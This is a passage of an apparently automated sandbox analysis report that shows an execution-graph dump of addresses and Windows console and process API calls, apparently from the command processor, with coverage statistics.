                                                                                                          • Instruction Fuzzy Hash: E4417E72A0A64286EA5AAF18F454279F7E1FF49B48F968534D64E03770EF3CE444C760

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:5.6%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:1410
                                                                                                          Total number of Limit Nodes:28
18503 7ff7ab12b900 166 API calls 18502->18503 18504 7ff7ab14942d 18503->18504 18537 7ff7ab149631 18504->18537 18659 7ff7ab1333a8 18504->18659 18506 7ff7ab138f80 7 API calls 18508 7ff7ab149659 18506->18508 18508->18457 18509 7ff7ab123278 166 API calls 18509->18537 18510 7ff7ab14947a wcschr 18511 7ff7ab14949b 18510->18511 18538 7ff7ab149638 18510->18538 18513 7ff7ab1333a8 iswspace 18511->18513 18512 7ff7ab1333a8 iswspace 18514 7ff7ab14945d wcsrchr 18512->18514 18516 7ff7ab1494a8 18513->18516 18514->18510 18515 7ff7ab149476 18514->18515 18515->18510 18517 7ff7ab1494d2 18516->18517 18518 7ff7ab1333a8 iswspace 18516->18518 18519 7ff7ab1494e0 GetStdHandle GetConsoleMode 18517->18519 18517->18538 18520 7ff7ab1494b9 wcsrchr 18518->18520 18521 7ff7ab14950c SetConsoleMode 18519->18521 18522 7ff7ab149525 GetStdHandle GetConsoleMode 18519->18522 18520->18517 18521->18522 18523 7ff7ab14956a 18522->18523 18524 7ff7ab149551 SetConsoleMode 18522->18524 18525 7ff7ab123240 166 API calls 18523->18525 18524->18523 18526 7ff7ab14957c GetStdHandle 18525->18526 18527 7ff7ab148450 367 API calls 18526->18527 18528 7ff7ab1495ab 18527->18528 18529 7ff7ab1495da SetConsoleMode 18528->18529 18530 7ff7ab1495f1 18528->18530 18529->18530 18531 7ff7ab14960d 18530->18531 18532 7ff7ab1495f6 SetConsoleMode 18530->18532 18533 7ff7ab14961e 18531->18533 18534 7ff7ab149633 18531->18534 18531->18537 18532->18531 18536 7ff7ab13498c 8 API calls 18533->18536 18535 7ff7ab139158 7 API calls 18534->18535 18535->18538 18536->18537 18537->18506 18538->18509 18540 7ff7ab14912d 18539->18540 18543 7ff7ab149159 18539->18543 18541 7ff7ab149135 fprintf 18540->18541 18542 7ff7ab149152 18541->18542 18542->18449 18543->18542 18544 7ff7ab133448 166 API calls 18543->18544 18544->18543 18550 7ff7ab13684c 18545->18550 18547 7ff7ab13641f 18547->18480 18547->18483 18548 7ff7ab1363f3 18548->18547 18549 7ff7ab13684c 188 API calls 18548->18549 18549->18548 18551 7ff7ab136877 18550->18551 18553 7ff7ab136962 18551->18553 18568 
7ff7ab136a28 18551->18568 18555 7ff7ab13f83b 18553->18555 18611 7ff7ab136120 18553->18611 18557 7ff7ab1369b7 wcschr 18557->18553 18558 7ff7ab1368dc 18557->18558 18558->18553 18559 7ff7ab1368f4 18558->18559 18560 7ff7ab13684c 187 API calls 18559->18560 18561 7ff7ab136913 18560->18561 18567 7ff7ab13695a 18561->18567 18577 7ff7ab135d20 18561->18577 18567->18548 18573 7ff7ab136a57 18568->18573 18569 7ff7ab1368a3 18569->18553 18569->18557 18569->18558 18570 7ff7ab136a70 iswdigit 18570->18569 18571 7ff7ab136a87 wcschr 18570->18571 18571->18569 18572 7ff7ab136aa6 wcschr 18571->18572 18572->18569 18574 7ff7ab136ac5 18572->18574 18573->18569 18573->18570 18574->18569 18575 7ff7ab136ad9 wcschr 18574->18575 18575->18569 18576 7ff7ab136af4 wcschr 18575->18576 18576->18569 18576->18574 18578 7ff7ab12cd90 166 API calls 18577->18578 18579 7ff7ab135d4e 18578->18579 18580 7ff7ab13f4d4 18579->18580 18582 7ff7ab135d5a 18579->18582 18581 7ff7ab123278 166 API calls 18580->18581 18583 7ff7ab13f4de 18581->18583 18617 7ff7ab133a90 18582->18617 18586 7ff7ab12ff70 2 API calls 18587 7ff7ab135d7e 18586->18587 18588 7ff7ab135d9a 18587->18588 18589 7ff7ab135d83 wcstol 18587->18589 18590 7ff7ab136b68 18588->18590 18589->18588 18593 7ff7ab136b73 18590->18593 18591 7ff7ab136941 18591->18567 18594 7ff7ab136068 18591->18594 18592 7ff7ab13f899 printf 18592->18591 18593->18591 18593->18592 18595 7ff7ab12cd90 166 API calls 18594->18595 18596 7ff7ab1360a5 18595->18596 18597 7ff7ab13f5dc 18596->18597 18598 7ff7ab1360b1 18596->18598 18599 7ff7ab123278 166 API calls 18597->18599 18601 7ff7ab1333f0 _vsnwprintf 18598->18601 18600 7ff7ab13f5e8 18599->18600 18602 7ff7ab13f5ee GetLastError 18600->18602 18603 7ff7ab1360d9 18601->18603 18604 7ff7ab13498c 8 API calls 18603->18604 18605 7ff7ab1360e6 18604->18605 18605->18602 18606 7ff7ab1360ee 18605->18606 18607 7ff7ab12ff70 2 API calls 18606->18607 18608 7ff7ab1360f6 18607->18608 18609 7ff7ab138f80 7 API calls 18608->18609 18610 7ff7ab136105 18609->18610 
18610->18567 18629 7ff7ab1361c8 18611->18629 18613 7ff7ab1361c8 188 API calls 18614 7ff7ab136154 18613->18614 18614->18613 18615 7ff7ab136b68 printf 18614->18615 18616 7ff7ab136187 18614->18616 18615->18614 18616->18567 18618 7ff7ab133aa4 18617->18618 18619 7ff7ab133b73 18617->18619 18618->18619 18620 7ff7ab1309f4 2 API calls 18618->18620 18619->18586 18621 7ff7ab133ac8 18620->18621 18622 7ff7ab12b900 166 API calls 18621->18622 18623 7ff7ab133ad0 18622->18623 18624 7ff7ab133ad8 wcsrchr 18623->18624 18627 7ff7ab133af4 18623->18627 18624->18627 18625 7ff7ab133b66 18626 7ff7ab12ff70 2 API calls 18625->18626 18626->18619 18627->18625 18628 7ff7ab133b2d _wcsnicmp 18627->18628 18628->18627 18635 7ff7ab136270 18629->18635 18631 7ff7ab13622f 18631->18614 18632 7ff7ab136270 188 API calls 18633 7ff7ab1361fc 18632->18633 18633->18631 18633->18632 18634 7ff7ab136b68 printf 18633->18634 18634->18633 18641 7ff7ab136318 18635->18641 18637 7ff7ab1362d7 18637->18633 18638 7ff7ab136318 188 API calls 18639 7ff7ab1362a4 18638->18639 18639->18637 18639->18638 18640 7ff7ab136b68 printf 18639->18640 18640->18639 18647 7ff7ab136454 18641->18647 18643 7ff7ab136387 18643->18639 18644 7ff7ab136454 188 API calls 18645 7ff7ab13634c 18644->18645 18645->18643 18645->18644 18646 7ff7ab136b68 printf 18645->18646 18646->18645 18653 7ff7ab13653c 18647->18653 18649 7ff7ab1364bf 18649->18645 18650 7ff7ab13653c 188 API calls 18651 7ff7ab136488 18650->18651 18651->18649 18651->18650 18652 7ff7ab136b68 printf 18651->18652 18652->18651 18654 7ff7ab13662c 188 API calls 18653->18654 18657 7ff7ab136570 18654->18657 18655 7ff7ab1365af 18655->18651 18656 7ff7ab13662c 188 API calls 18656->18657 18657->18655 18657->18656 18658 7ff7ab136b68 printf 18657->18658 18658->18657 18660 7ff7ab1333b8 18659->18660 18661 7ff7ab1333bd iswspace 18660->18661 18662 7ff7ab1333d0 18660->18662 18661->18660 18661->18662 18662->18510 18662->18512 18662->18538 16779 7ff7ab138d80 16780 7ff7ab138da4 16779->16780 16781 7ff7ab138db6 
16780->16781 16782 7ff7ab138dbf Sleep 16780->16782 16783 7ff7ab138ddb _amsg_exit 16781->16783 16785 7ff7ab138de7 16781->16785 16782->16780 16783->16785 16784 7ff7ab138e56 _initterm 16786 7ff7ab138e73 _IsNonwritableInCurrentImage 16784->16786 16785->16784 16785->16786 16791 7ff7ab138e3c 16785->16791 16793 7ff7ab1337d8 GetCurrentThreadId OpenThread 16786->16793 16826 7ff7ab1304f4 16793->16826 16795 7ff7ab133839 HeapSetInformation RegOpenKeyExW 16796 7ff7ab13e9f8 RegQueryValueExW RegCloseKey 16795->16796 16797 7ff7ab13388d 16795->16797 16799 7ff7ab13ea41 GetThreadLocale 16796->16799 16798 7ff7ab135920 VirtualQuery VirtualQuery 16797->16798 16800 7ff7ab1338ab GetConsoleOutputCP GetCPInfo 16798->16800 16808 7ff7ab133919 16799->16808 16800->16799 16801 7ff7ab1338f1 memset 16800->16801 16801->16808 16802 7ff7ab134d5c 391 API calls 16802->16808 16803 7ff7ab123240 166 API calls 16803->16808 16804 7ff7ab13eb27 _setjmp 16804->16808 16805 7ff7ab133948 _setjmp 16805->16808 16806 7ff7ab148530 370 API calls 16806->16808 16807 7ff7ab1301b8 6 API calls 16807->16808 16808->16796 16808->16802 16808->16803 16808->16804 16808->16805 16808->16806 16808->16807 16809 7ff7ab134c1c 166 API calls 16808->16809 16810 7ff7ab12df60 481 API calls 16808->16810 16811 7ff7ab13eb71 _setmode 16808->16811 16812 7ff7ab1386f0 182 API calls 16808->16812 16813 7ff7ab130580 12 API calls 16808->16813 16815 7ff7ab1358e4 EnterCriticalSection LeaveCriticalSection 16808->16815 16817 7ff7ab12be00 647 API calls 16808->16817 16818 7ff7ab1358e4 EnterCriticalSection LeaveCriticalSection 16808->16818 16809->16808 16810->16808 16811->16808 16812->16808 16814 7ff7ab13398b GetConsoleOutputCP GetCPInfo 16813->16814 16816 7ff7ab1304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16814->16816 16815->16808 16816->16808 16817->16808 16819 7ff7ab13ebbe GetConsoleOutputCP GetCPInfo 16818->16819 16820 7ff7ab1304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16819->16820 16821 7ff7ab13ebe6 16820->16821 16822 7ff7ab12be00 
647 API calls 16821->16822 16823 7ff7ab130580 12 API calls 16821->16823 16822->16821 16824 7ff7ab13ebfc GetConsoleOutputCP GetCPInfo 16823->16824 16825 7ff7ab1304f4 GetModuleHandleW GetProcAddress SetThreadLocale 16824->16825 16825->16808 16827 7ff7ab130504 16826->16827 16828 7ff7ab13051e GetModuleHandleW 16827->16828 16829 7ff7ab13054d GetProcAddress 16827->16829 16830 7ff7ab13056c SetThreadLocale 16827->16830 16828->16827 16829->16827 22025 7ff7ab12b8c0 22028 7ff7ab12be00 22025->22028 22029 7ff7ab12b8d4 22028->22029 22030 7ff7ab12be1b 22028->22030 22030->22029 22031 7ff7ab12be47 memset 22030->22031 22032 7ff7ab12be67 22030->22032 22134 7ff7ab12bff0 22031->22134 22033 7ff7ab12be73 22032->22033 22036 7ff7ab12bf29 22032->22036 22037 7ff7ab12beaf 22032->22037 22035 7ff7ab12be92 22033->22035 22039 7ff7ab12bf0c 22033->22039 22045 7ff7ab12bea1 22035->22045 22062 7ff7ab12c620 GetConsoleTitleW 22035->22062 22038 7ff7ab12cd90 166 API calls 22036->22038 22037->22029 22043 7ff7ab12bff0 185 API calls 22037->22043 22041 7ff7ab12bf33 22038->22041 22172 7ff7ab12b0d8 memset 22039->22172 22041->22037 22046 7ff7ab12bf70 22041->22046 22047 7ff7ab1288a8 _wcsicmp 22041->22047 22043->22029 22045->22037 22051 7ff7ab12af98 2 API calls 22045->22051 22058 7ff7ab12bf75 22046->22058 22232 7ff7ab1271ec 22046->22232 22050 7ff7ab12bf5a 22047->22050 22048 7ff7ab12bf1e 22048->22037 22050->22046 22053 7ff7ab130a6c 273 API calls 22050->22053 22051->22037 22052 7ff7ab12bfa9 22052->22037 22054 7ff7ab12cd90 166 API calls 22052->22054 22053->22046 22055 7ff7ab12bfbb 22054->22055 22055->22037 22056 7ff7ab13081c 166 API calls 22055->22056 22056->22058 22057 7ff7ab12b0d8 194 API calls 22059 7ff7ab12bf7f 22057->22059 22058->22057 22059->22037 22105 7ff7ab135ad8 22059->22105 22064 7ff7ab12c675 22062->22064 22068 7ff7ab12ca2f 22062->22068 22063 7ff7ab13c5fc GetLastError 22063->22068 22065 7ff7ab12ca40 17 API calls 22064->22065 22074 7ff7ab12c69b 22065->22074 22066 7ff7ab123278 166 API calls 22066->22068 
22067 7ff7ab13855c ??_V@YAXPEAX 22067->22068 22068->22063 22068->22066 22068->22067 22069 7ff7ab12c9b5 22073 7ff7ab13855c ??_V@YAXPEAX 22069->22073 22070 7ff7ab1289c0 23 API calls 22093 7ff7ab12c762 22070->22093 22071 7ff7ab12c978 towupper 22071->22093 22072 7ff7ab13855c ??_V@YAXPEAX 22072->22093 22094 7ff7ab12c855 22073->22094 22074->22068 22074->22069 22076 7ff7ab12d3f0 223 API calls 22074->22076 22074->22093 22075 7ff7ab13c60e 22078 7ff7ab14ec14 173 API calls 22075->22078 22079 7ff7ab12c741 22076->22079 22077 7ff7ab12c872 22082 7ff7ab13855c ??_V@YAXPEAX 22077->22082 22078->22093 22081 7ff7ab12c74d 22079->22081 22084 7ff7ab12c8b5 wcsncmp 22079->22084 22080 7ff7ab13c6b8 SetConsoleTitleW 22080->22077 22085 7ff7ab12bd38 207 API calls 22081->22085 22081->22093 22083 7ff7ab12c87c 22082->22083 22086 7ff7ab138f80 7 API calls 22083->22086 22084->22081 22084->22093 22085->22093 22088 7ff7ab12c88e 22086->22088 22087 7ff7ab12c83d 22238 7ff7ab12cb40 22087->22238 22088->22045 22090 7ff7ab12c78a wcschr 22090->22093 22092 7ff7ab13291c 8 API calls 22092->22093 22093->22063 22093->22068 22093->22069 22093->22070 22093->22071 22093->22072 22093->22075 22093->22087 22093->22090 22093->22092 22095 7ff7ab12ca25 22093->22095 22097 7ff7ab13c684 22093->22097 22100 7ff7ab12ca2a 22093->22100 22102 7ff7ab12ca16 GetLastError 22093->22102 22094->22077 22094->22080 22098 7ff7ab123278 166 API calls 22095->22098 22099 7ff7ab123278 166 API calls 22097->22099 22098->22068 22099->22068 22101 7ff7ab139158 7 API calls 22100->22101 22101->22068 22104 7ff7ab123278 166 API calls 22102->22104 22104->22068 22106 7ff7ab12cd90 166 API calls 22105->22106 22107 7ff7ab135b12 22106->22107 22108 7ff7ab12cb40 166 API calls 22107->22108 22132 7ff7ab135b8b 22107->22132 22109 7ff7ab135b26 22108->22109 22112 7ff7ab130a6c 273 API calls 22109->22112 22109->22132 22110 7ff7ab138f80 7 API calls 22111 7ff7ab12bf99 22110->22111 22111->22045 22113 7ff7ab135b43 22112->22113 22114 7ff7ab135bb8 22113->22114 22115 7ff7ab135b48 
GetConsoleTitleW 22113->22115 22116 7ff7ab135bbd GetConsoleTitleW 22114->22116 22117 7ff7ab135bf4 22114->22117 22118 7ff7ab12cad4 172 API calls 22115->22118 22119 7ff7ab12cad4 172 API calls 22116->22119 22120 7ff7ab135bfd 22117->22120 22121 7ff7ab13f452 22117->22121 22122 7ff7ab135b66 22118->22122 22123 7ff7ab135bdb 22119->22123 22127 7ff7ab135c1b 22120->22127 22128 7ff7ab13f462 22120->22128 22120->22132 22125 7ff7ab133c24 166 API calls 22121->22125 22254 7ff7ab134224 InitializeProcThreadAttributeList 22122->22254 22314 7ff7ab1296e8 22123->22314 22125->22132 22130 7ff7ab123278 166 API calls 22127->22130 22131 7ff7ab123278 166 API calls 22128->22131 22129 7ff7ab135b7f 22133 7ff7ab135c3c SetConsoleTitleW 22129->22133 22130->22132 22131->22132 22132->22110 22133->22132 22135 7ff7ab12c0c4 22134->22135 22136 7ff7ab12c01c 22134->22136 22135->22032 22137 7ff7ab12c022 22136->22137 22138 7ff7ab12c086 22136->22138 22139 7ff7ab12c030 22137->22139 22140 7ff7ab12c113 22137->22140 22142 7ff7ab12c144 22138->22142 22153 7ff7ab12c094 22138->22153 22141 7ff7ab12c039 wcschr 22139->22141 22155 7ff7ab12c053 22139->22155 22151 7ff7ab12ff70 2 API calls 22140->22151 22140->22155 22144 7ff7ab12c301 22141->22144 22141->22155 22143 7ff7ab12c151 22142->22143 22161 7ff7ab12c1c8 22142->22161 22520 7ff7ab12c460 22143->22520 22150 7ff7ab12cd90 166 API calls 22144->22150 22145 7ff7ab12c058 22156 7ff7ab12ff70 2 API calls 22145->22156 22159 7ff7ab12c073 22145->22159 22146 7ff7ab12c0c6 22149 7ff7ab12c0cf wcschr 22146->22149 22146->22159 22148 7ff7ab12c460 183 API calls 22148->22153 22154 7ff7ab12c1be 22149->22154 22149->22159 22171 7ff7ab12c30b 22150->22171 22151->22155 22153->22135 22153->22148 22157 7ff7ab12cd90 166 API calls 22154->22157 22155->22145 22155->22146 22163 7ff7ab12c211 22155->22163 22156->22159 22157->22161 22158 7ff7ab12c460 183 API calls 22158->22135 22159->22135 22160 7ff7ab12c460 183 API calls 22159->22160 22160->22159 22161->22135 22162 7ff7ab12c285 22161->22162 22161->22163 
22168 7ff7ab12d840 178 API calls 22161->22168 22162->22163 22167 7ff7ab12b6b0 170 API calls 22162->22167 22166 7ff7ab12ff70 2 API calls 22163->22166 22164 7ff7ab12b6b0 170 API calls 22164->22155 22165 7ff7ab12d840 178 API calls 22165->22171 22166->22135 22169 7ff7ab12c2ac 22167->22169 22168->22161 22169->22159 22169->22163 22170 7ff7ab12c3d4 22170->22159 22170->22163 22170->22164 22171->22135 22171->22163 22171->22165 22171->22170 22173 7ff7ab12ca40 17 API calls 22172->22173 22189 7ff7ab12b162 22173->22189 22174 7ff7ab12b2e1 22176 7ff7ab12b2f7 ??_V@YAXPEAX 22174->22176 22177 7ff7ab12b303 22174->22177 22175 7ff7ab12b1d9 22180 7ff7ab12cd90 166 API calls 22175->22180 22197 7ff7ab12b1ed 22175->22197 22176->22177 22179 7ff7ab138f80 7 API calls 22177->22179 22178 7ff7ab131ea0 8 API calls 22178->22189 22181 7ff7ab12b315 22179->22181 22180->22197 22181->22035 22181->22048 22183 7ff7ab12b228 _get_osfhandle 22185 7ff7ab12b23f _get_osfhandle 22183->22185 22183->22197 22184 7ff7ab13bfef _get_osfhandle SetFilePointer 22186 7ff7ab13c01d 22184->22186 22184->22197 22185->22197 22188 7ff7ab1333f0 _vsnwprintf 22186->22188 22191 7ff7ab13c038 22188->22191 22189->22174 22189->22175 22189->22178 22189->22189 22190 7ff7ab1301b8 6 API calls 22190->22197 22196 7ff7ab123278 166 API calls 22191->22196 22192 7ff7ab13c1c3 22193 7ff7ab1333f0 _vsnwprintf 22192->22193 22193->22191 22194 7ff7ab12d208 _close 22194->22197 22195 7ff7ab1326e0 19 API calls 22195->22197 22199 7ff7ab13c1f9 22196->22199 22197->22174 22197->22183 22197->22184 22197->22190 22197->22192 22197->22194 22197->22195 22198 7ff7ab13c060 22197->22198 22200 7ff7ab13c246 22197->22200 22202 7ff7ab12b038 _dup2 22197->22202 22207 7ff7ab12b356 22197->22207 22231 7ff7ab13c1a5 22197->22231 22534 7ff7ab12affc _dup 22197->22534 22536 7ff7ab14f318 _get_osfhandle GetFileType 22197->22536 22198->22200 22203 7ff7ab1309f4 2 API calls 22198->22203 22201 7ff7ab12af98 2 API calls 22199->22201 22204 7ff7ab12af98 2 API calls 22200->22204 22201->22174 
22202->22197 22208 7ff7ab13c084 22203->22208 22209 7ff7ab13c24b 22204->22209 22205 7ff7ab12b038 _dup2 22206 7ff7ab13c1b7 22205->22206 22210 7ff7ab13c207 22206->22210 22211 7ff7ab13c1be 22206->22211 22214 7ff7ab12af98 2 API calls 22207->22214 22212 7ff7ab12b900 166 API calls 22208->22212 22213 7ff7ab14f1d8 166 API calls 22209->22213 22217 7ff7ab12d208 _close 22210->22217 22215 7ff7ab12d208 _close 22211->22215 22216 7ff7ab13c08c 22212->22216 22213->22174 22218 7ff7ab13c211 22214->22218 22215->22192 22219 7ff7ab13c094 wcsrchr 22216->22219 22223 7ff7ab13c0ad 22216->22223 22217->22207 22220 7ff7ab1333f0 _vsnwprintf 22218->22220 22219->22223 22221 7ff7ab13c22c 22220->22221 22222 7ff7ab123278 166 API calls 22221->22222 22222->22174 22223->22223 22225 7ff7ab13c0e0 _wcsnicmp 22223->22225 22227 7ff7ab13c106 22223->22227 22224 7ff7ab12ff70 2 API calls 22226 7ff7ab13c13b 22224->22226 22225->22223 22226->22200 22228 7ff7ab13c146 SearchPathW 22226->22228 22227->22224 22228->22200 22229 7ff7ab13c188 22228->22229 22230 7ff7ab1326e0 19 API calls 22229->22230 22230->22231 22231->22205 22233 7ff7ab127279 22232->22233 22234 7ff7ab127211 _setjmp 22232->22234 22233->22052 22234->22233 22236 7ff7ab127265 22234->22236 22537 7ff7ab1272b0 22236->22537 22239 7ff7ab12cb63 22238->22239 22240 7ff7ab12cd90 166 API calls 22239->22240 22241 7ff7ab12c848 22240->22241 22241->22094 22242 7ff7ab12cad4 22241->22242 22243 7ff7ab12cb05 22242->22243 22244 7ff7ab12cad9 22242->22244 22243->22094 22244->22243 22245 7ff7ab12cd90 166 API calls 22244->22245 22246 7ff7ab13c722 22245->22246 22246->22243 22247 7ff7ab13c72e GetConsoleTitleW 22246->22247 22247->22243 22248 7ff7ab13c74a 22247->22248 22249 7ff7ab12b6b0 170 API calls 22248->22249 22253 7ff7ab13c778 22249->22253 22250 7ff7ab13c7ec 22251 7ff7ab12ff70 2 API calls 22250->22251 22251->22243 22252 7ff7ab13c7dd SetConsoleTitleW 22252->22250 22253->22250 22253->22252 22255 7ff7ab1342ab UpdateProcThreadAttribute 22254->22255 22256 7ff7ab13ecd4 GetLastError 
22254->22256 22258 7ff7ab1342eb memset memset GetStartupInfoW 22255->22258 22259 7ff7ab13ecf0 GetLastError 22255->22259 22257 7ff7ab13ecee 22256->22257 22261 7ff7ab133a90 170 API calls 22258->22261 22351 7ff7ab149eec 22259->22351 22263 7ff7ab1343a8 22261->22263 22264 7ff7ab12b900 166 API calls 22263->22264 22265 7ff7ab1343bb 22264->22265 22266 7ff7ab134638 _local_unwind 22265->22266 22267 7ff7ab1343cc 22265->22267 22266->22267 22268 7ff7ab1343de wcsrchr 22267->22268 22269 7ff7ab134415 22267->22269 22268->22269 22271 7ff7ab1343f7 lstrcmpW 22268->22271 22338 7ff7ab135a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22269->22338 22271->22269 22273 7ff7ab134668 22271->22273 22272 7ff7ab13441a 22274 7ff7ab13442a CreateProcessW 22272->22274 22277 7ff7ab134596 CreateProcessAsUserW 22272->22277 22339 7ff7ab149044 22273->22339 22276 7ff7ab13448b 22274->22276 22278 7ff7ab134672 GetLastError 22276->22278 22279 7ff7ab134495 CloseHandle 22276->22279 22277->22276 22287 7ff7ab13468d 22278->22287 22280 7ff7ab13498c 8 API calls 22279->22280 22281 7ff7ab1344c5 22280->22281 22286 7ff7ab1344cd 22281->22286 22281->22287 22282 7ff7ab1347a3 22282->22129 22283 7ff7ab1344f8 22283->22282 22285 7ff7ab134612 22283->22285 22289 7ff7ab135cb4 7 API calls 22283->22289 22284 7ff7ab12cd90 166 API calls 22288 7ff7ab134724 22284->22288 22290 7ff7ab13461c 22285->22290 22292 7ff7ab1347e1 CloseHandle 22285->22292 22286->22282 22286->22283 22302 7ff7ab14a250 33 API calls 22286->22302 22287->22284 22287->22286 22291 7ff7ab13472c _local_unwind 22288->22291 22298 7ff7ab13473d 22288->22298 22293 7ff7ab134517 22289->22293 22294 7ff7ab12ff70 GetProcessHeap RtlFreeHeap 22290->22294 22291->22298 22292->22290 22295 7ff7ab1333f0 _vsnwprintf 22293->22295 22296 7ff7ab1347fa DeleteProcThreadAttributeList 22294->22296 22297 7ff7ab134544 22295->22297 22299 7ff7ab138f80 7 API calls 22296->22299 22300 7ff7ab13498c 8 API calls 22297->22300 22306 7ff7ab12ff70 GetProcessHeap RtlFreeHeap 22298->22306 22303 
7ff7ab134820 22299->22303 22301 7ff7ab134558 22300->22301 22304 7ff7ab1347ae 22301->22304 22305 7ff7ab134564 22301->22305 22302->22283 22303->22129 22308 7ff7ab1333f0 _vsnwprintf 22304->22308 22307 7ff7ab13498c 8 API calls 22305->22307 22309 7ff7ab13475b _local_unwind 22306->22309 22310 7ff7ab134577 22307->22310 22308->22285 22309->22286 22310->22290 22311 7ff7ab13457f 22310->22311 22312 7ff7ab14a920 210 API calls 22311->22312 22313 7ff7ab134584 22312->22313 22313->22290 22318 7ff7ab129737 22314->22318 22316 7ff7ab12977d memset 22319 7ff7ab12ca40 17 API calls 22316->22319 22317 7ff7ab12cd90 166 API calls 22317->22318 22318->22316 22318->22317 22320 7ff7ab13b76e 22318->22320 22321 7ff7ab13b7b3 22318->22321 22323 7ff7ab12b364 17 API calls 22318->22323 22330 7ff7ab13b79a 22318->22330 22332 7ff7ab12986d 22318->22332 22333 7ff7ab1296b4 186 API calls 22318->22333 22353 7ff7ab131fac memset 22318->22353 22380 7ff7ab12ce10 22318->22380 22430 7ff7ab135920 22318->22430 22319->22318 22322 7ff7ab123278 166 API calls 22320->22322 22325 7ff7ab13b787 22322->22325 22323->22318 22324 7ff7ab13855c ??_V@YAXPEAX 22324->22321 22326 7ff7ab13b795 22325->22326 22328 7ff7ab14e944 393 API calls 22325->22328 22436 7ff7ab147694 22326->22436 22328->22326 22330->22324 22334 7ff7ab12988c 22332->22334 22335 7ff7ab129880 ??_V@YAXPEAX 22332->22335 22333->22318 22336 7ff7ab138f80 7 API calls 22334->22336 22335->22334 22337 7ff7ab12989d 22336->22337 22337->22129 22340 7ff7ab133a90 170 API calls 22339->22340 22341 7ff7ab149064 22340->22341 22342 7ff7ab14906e 22341->22342 22343 7ff7ab149083 22341->22343 22344 7ff7ab13498c 8 API calls 22342->22344 22346 7ff7ab12cd90 166 API calls 22343->22346 22345 7ff7ab149081 22344->22345 22345->22269 22347 7ff7ab14909b 22346->22347 22347->22345 22348 7ff7ab13498c 8 API calls 22347->22348 22349 7ff7ab1490ec 22348->22349 22350 7ff7ab12ff70 2 API calls 22349->22350 22350->22345 22352 7ff7ab13ed0a DeleteProcThreadAttributeList 22351->22352 22352->22257 22354 7ff7ab13203b 
22353->22354 22355 7ff7ab1320b0 22354->22355 22356 7ff7ab132094 22354->22356 22357 7ff7ab133060 171 API calls 22355->22357 22359 7ff7ab13211c 22355->22359 22358 7ff7ab1320a6 22356->22358 22360 7ff7ab123278 166 API calls 22356->22360 22357->22359 22361 7ff7ab138f80 7 API calls 22358->22361 22359->22358 22362 7ff7ab132e44 2 API calls 22359->22362 22360->22358 22363 7ff7ab132325 22361->22363 22364 7ff7ab132148 22362->22364 22363->22318 22364->22358 22365 7ff7ab132d70 3 API calls 22364->22365 22366 7ff7ab1321af 22365->22366 22367 7ff7ab12b900 166 API calls 22366->22367 22369 7ff7ab1321d0 22367->22369 22368 7ff7ab13e04a ??_V@YAXPEAX 22368->22358 22369->22368 22370 7ff7ab13221c wcsspn 22369->22370 22379 7ff7ab1322a4 ??_V@YAXPEAX 22369->22379 22372 7ff7ab12b900 166 API calls 22370->22372 22373 7ff7ab13223b 22372->22373 22373->22368 22376 7ff7ab132252 22373->22376 22374 7ff7ab12d3f0 223 API calls 22374->22379 22375 7ff7ab13e06d wcschr 22375->22376 22376->22375 22377 7ff7ab13e090 towupper 22376->22377 22378 7ff7ab13228f 22376->22378 22377->22376 22377->22378 22378->22374 22379->22358 22418 7ff7ab12d0f8 22380->22418 22424 7ff7ab12ce5b 22380->22424 22381 7ff7ab138f80 7 API calls 22383 7ff7ab12d10a 22381->22383 22382 7ff7ab13c860 22384 7ff7ab13c97c 22382->22384 22385 7ff7ab14ee88 390 API calls 22382->22385 22383->22318 22386 7ff7ab14e9b4 197 API calls 22384->22386 22388 7ff7ab13c879 22385->22388 22389 7ff7ab13c981 longjmp 22386->22389 22387 7ff7ab130494 182 API calls 22387->22424 22390 7ff7ab13c95c 22388->22390 22391 7ff7ab13c882 EnterCriticalSection LeaveCriticalSection 22388->22391 22392 7ff7ab13c99a 22389->22392 22390->22384 22397 7ff7ab1296b4 186 API calls 22390->22397 22396 7ff7ab12d0e3 22391->22396 22393 7ff7ab13c9b3 ??_V@YAXPEAX 22392->22393 22392->22418 22393->22418 22395 7ff7ab12ceaa _tell 22398 7ff7ab12d208 _close 22395->22398 22396->22318 22397->22390 22398->22424 22399 7ff7ab12cd90 166 API calls 22399->22424 22400 7ff7ab13c9d5 22401 7ff7ab14d610 167 API calls 
22400->22401 22403 7ff7ab13c9da 22401->22403 22402 7ff7ab12b900 166 API calls 22402->22424 22404 7ff7ab13ca07 22403->22404 22406 7ff7ab14bfec 176 API calls 22403->22406 22405 7ff7ab14e91c 198 API calls 22404->22405 22410 7ff7ab13ca0c 22405->22410 22407 7ff7ab13c9f1 22406->22407 22409 7ff7ab123240 166 API calls 22407->22409 22408 7ff7ab12cf33 memset 22408->22424 22409->22404 22410->22318 22411 7ff7ab12ca40 17 API calls 22411->22424 22412 7ff7ab12d184 wcschr 22412->22424 22413 7ff7ab14bfec 176 API calls 22413->22424 22414 7ff7ab13c9c9 22416 7ff7ab13855c ??_V@YAXPEAX 22414->22416 22415 7ff7ab12d1a7 wcschr 22415->22424 22416->22418 22417 7ff7ab14778c 166 API calls 22417->22424 22418->22381 22419 7ff7ab130a6c 273 API calls 22419->22424 22420 7ff7ab12be00 635 API calls 22420->22424 22421 7ff7ab133448 166 API calls 22421->22424 22422 7ff7ab12cfab _wcsicmp 22422->22424 22423 7ff7ab130580 12 API calls 22425 7ff7ab12d003 GetConsoleOutputCP GetCPInfo 22423->22425 22424->22382 22424->22387 22424->22392 22424->22396 22424->22399 22424->22400 22424->22402 22424->22408 22424->22411 22424->22412 22424->22413 22424->22414 22424->22415 22424->22417 22424->22418 22424->22419 22424->22420 22424->22421 22424->22422 22424->22423 22428 7ff7ab131fac 238 API calls 22424->22428 22429 7ff7ab12d044 ??_V@YAXPEAX 22424->22429 22442 7ff7ab12df60 22424->22442 22462 7ff7ab14c738 22424->22462 22426 7ff7ab1304f4 3 API calls 22425->22426 22426->22424 22428->22424 22429->22424 22431 7ff7ab13596c 22430->22431 22435 7ff7ab135a12 22430->22435 22432 7ff7ab13598d VirtualQuery 22431->22432 22431->22435 22433 7ff7ab1359ad 22432->22433 22432->22435 22434 7ff7ab1359b7 VirtualQuery 22433->22434 22433->22435 22434->22433 22434->22435 22435->22318 22441 7ff7ab1476a3 22436->22441 22437 